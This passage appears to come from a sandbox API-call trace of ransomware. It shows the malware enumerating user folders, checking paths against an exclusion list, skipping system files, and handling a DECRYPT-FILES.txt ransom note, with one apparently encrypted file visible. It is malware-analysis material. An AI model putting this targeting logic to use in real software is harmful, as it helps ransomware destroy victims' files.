(lpString="DECRYPT-FILES.txt") returned 17 [0186.155] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\DECRYPT-FILES.txt") returned 58 [0186.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0186.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*" [0186.155] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0xb00e1ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg.Qqz7Hy", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.155] CloseHandle (hObject=0x254) returned 1 [0186.156] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0186.156] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0186.156] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0186.156] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0186.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\" [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\All Users") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="AhnLab") returned 0x0 [0186.156] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.156] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0186.156] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.156] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\0a16c9.tmp") returned 48 [0186.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0186.157] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.157] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\DECRYPT-FILES.txt") returned 55 [0186.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned 37 [0186.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*" [0186.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0xb00e1ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg.Qqz7Hy", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.157] CloseHandle (hObject=0x254) returned 1 [0186.157] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0186.157] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0186.157] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0186.157] lstrcatW (in: lpString1="Saved Games", lpString2="\\" | out: lpString1="Saved Games\\") returned="Saved Games\\" [0186.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0186.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Program Files") returned 0x0 [0186.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch=":\\Windows") returned 0x0 [0186.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Games\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\All Users") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="AhnLab") returned 0x0 [0186.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0186.158] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.158] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\0a16c9.tmp") returned 53 [0186.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0186.158] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.158] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\DECRYPT-FILES.txt") returned 60 [0186.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0186.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*" [0186.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.159] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.159] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.159] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1a9c640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.159] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.159] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.159] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.159] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.159] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.159] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 42 [0186.159] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.159] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0186.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\0a16c9.tmp" [0186.159] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.160] CloseHandle (hObject=0x0) returned 0 [0186.160] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.160] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0108020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.160] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.160] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.160] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.160] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.160] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.160] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.160] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.160] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.160] CloseHandle (hObject=0x254) returned 1 [0186.160] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0186.160] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0186.160] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0186.161] lstrcatW (in: lpString1="Searches", lpString2="\\" | out: lpString1="Searches\\") returned="Searches\\" [0186.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Program Files") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch=":\\Windows") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Games\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\All Users") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="AhnLab") returned 0x0 [0186.161] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.161] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.161] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\0a16c9.tmp") returned 50 [0186.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.161] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.162] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\DECRYPT-FILES.txt") returned 57 [0186.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*" [0186.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.162] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.162] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.162] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1a9c640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1a9c640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1a9c640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.162] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.162] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.162] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.162] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.162] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.162] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.162] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.162] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: 